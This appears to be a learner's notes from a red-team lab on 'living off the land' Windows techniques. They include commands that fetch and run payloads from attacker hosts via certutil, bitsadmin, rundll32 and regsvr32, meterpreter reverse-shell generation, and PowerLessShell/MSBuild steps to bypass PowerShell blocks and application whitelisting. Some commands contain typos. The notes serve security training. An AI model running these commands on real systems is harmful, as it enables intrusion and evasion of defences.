Living off the land - use what is given - built-in tools and utilities -recon -file ops -arbitrary code exe -lateral movement -security product bypass
Windows Sysinternals -set of tools and advanced sys utilities -manage, troubleshoot, diagnose -accept microsoft license agreement to use tools use command: -accepteula
AccessChk: help admins check specified access for files, dir, reg keys, global obj, win serv PsExec: executes programs on remote system ADExplorer: AD tool to help view and manage AD database ProcDump: monitor running processes for CPU spikes and dump memory for analysis ProcMon: process monitoring TCPView: lists all TCP and UDP connections PsTools: list detailed info Portmon: monitor serial and parallel port activity Whois: info for a specified domain name or IP
-access Sysinternals: web, windows share, command prompt
C:\Users\thm> C:\Tools\SysinternalsSuite\PsExec64.exe
Red Team = useful because they are trusted by OS -tools useful for evading detection
LOLBAS
Living off the Land Binaries And Scripts - community driven repository gathering a collection of binaries, scripts, libraries that could be used for red team purposes
https://lolbas-project.github.io/
File Operations
Certutil: built-in utility for managing certification services -used to dump and display Certification Authority (CA) -can encode and transfer files unrelated to certification - Ingress Tool Transfer (T1105) -using split technique download file from URL certutil -URLcache -split -f http://Attacker_IP/payload.exe C:\Windows\Temp\payload.exe -used for eecoding C:\Users\thm> certutil -encode payload.exe Encoded-payload.txt
BITSAdmin: sys admin utility that can be used to create, download, or upload BITS (background intelligent transfer service) -low-bandwidth and asynchronous method to download and upload files from HTTP webservers and SMB servers -abused to download and execute malicious payload (T1197) C:\Users\thm>bitsadmin.exe /transfer /Download /priority Foreground http://Attacker_IP/payload.exe c:\Users\thm\Desktop\payload.exe
FindStr: find text and string patterns in files -can be used to download remote files from SMB shared folders C:\Users\thm>findstr /V dummystring \MachineName\ShareFolder\test.exe > c:\Windows\Temp\test.exe
bitsadmin.exe /transfer /Download /priority Foregraound http://[IP]/file enc_thm_0YmFiOG_file.txt
certutil.exe -decode enc_thm_0YmFiOG_file.txt decoded.txt type decoded.txt THM{ea4e2b9f362320d098635d4bab8a568e}
File Execution -Signed Binary Proxy Execution / Indirect Command Execution - attacker leverages other system tools to spawn malicious payloads.
File Explorer: -can execute other .exe files -indirect command execution where explore.exe can be used to launch malicious scripts from trusted parent process -location C:\Windows\explorer.exe - 32bit -location C:\Windows\SysWOW64\explorer.exe - 64bit C:\Users\thm> explorer.exe /root,“C:\Windows\System32\calc.exe”
WMIC: -Windows management instrumentation (WMIC) - windows command line utility that manages windows componenets -can be used to execute binaries for evading defensive measures (T1218) C:\Users\thm> wmic.exe process call create calc
Rundll32: -Microsoft built-in tool that loads and runs Dynamic Link Library (DLL) files -signed binary proxy execution using Rundll32 (T1218) -location C:\Windows\System32\rundll32.exe - 32 bits -location C:\Windows\System64\rundll32.exe - 64 bits -execute calc C:\Users\thm> rundll32.exe javascript:“..\mshtml.ddl,RunHTMLApplication “;eval(“w=newActiveXObject(“WScript.Shell”);w.run(“calc”;window.close()”); -run powershell script C:\Users\thm> rundll32.exe javasript:“..\mshtml, RUNHTMLApplication”;document.write();new%20ActiveXObject(“WScript.Shell”).Run(“powershell -nop -exec bypass -c IEX (New-ObjectNet.WebClient).DownloadString(‘http://[IP]/script.ps1’);”);
Bypassing Application Whitelisting
Application whitelisting: microsoft endpoint security feature that prevents malicious and unauthorized programs from executing in real-time -rule based, list of approved applications or executables
Regsvr32 -cmd line tool to register and unregister DLLs -location: C:\Windows\System32\regsvr32.exe - 32 bit -location: C:\Windows\SysWOW64\regsvr32.exe - 64 bit -can be used to execute arbitrary binaries and bypass windows application whitelisting -create a malicious DLL using msvenom msfvenom -p windows/meterpreter/reverse_tcp LHOST=[IP] LPORT=[PORT] -f dll -a x86 > name.dll msfconsole -q use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set LHOST [IP] set LPORT [PORT] exploit -serve file python3 -m http.server [Port to serve malicious DLL] -get served file on target machine -use regsvr32.exe C:\Windows\System32\regsvr32.exe /s /n /u /i:http://[IP]/name.dll
Bourne Again Shell (Bash) -Microsft added support for Linux env (Windows Subsystem for Linux - WSL) -WSL1 and WSL2 versions -WSL - Hyper-V virtualized Linux distribution that runs on the OS -bash.exe is a microsfot tool for interacting with the linux environment -can be used to execute payloads and bypass windows application whitelisting bash.exe -c calc.exe (T1202)
Other techniques
Shortcuts -symbolic links used for referring to other files or application within the os -can be modified to execute other files (T1547)
No Powershell -organization block powershell.exe due to malicious use -can run powershell without spawning -PowerLessShell - python-based tool that generates malicious code to run on a target machine without showing an instance of the Powershell process -uses Microsoft Build Engine (MSBuild) -download git clone https://github.com/Mr-Un1k0d3r/PowerLessShell.git -generate powershell payload using msfvenom msfvenom -p windows/meterpreter/reverse_winhttps LHOST=AttackBox_IP LPORT=PORT -f psh-reflection > liv0ff.ps1 -listen using metasploit msfconsole -q -x “use exploit/multi/handler; set payload windows/meterpreter/reverse_winhttps; set lhost AttackBox_IP;set lport PORT;exploit” -change powerLessShell directory project to convert payload to be compatible with MSBuild tool python2 PowerLessShell.py -type powershell -source /tmp/liv0ff.ps1 -output liv0ff.csproj -transfer output file to windows machine python3 -m http.server [IP] -run the .csproj file using MSBuild.exe C:\Users\thm> c:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe c:\Users\thm\Desktop\liv0ff.csproj THM{23005dc4369a0eef728aa39ff8cc3be2}
Further reading
Astraroth: https://www.armor.com/resources/threat-intelligence/astaroth-banking-trojan/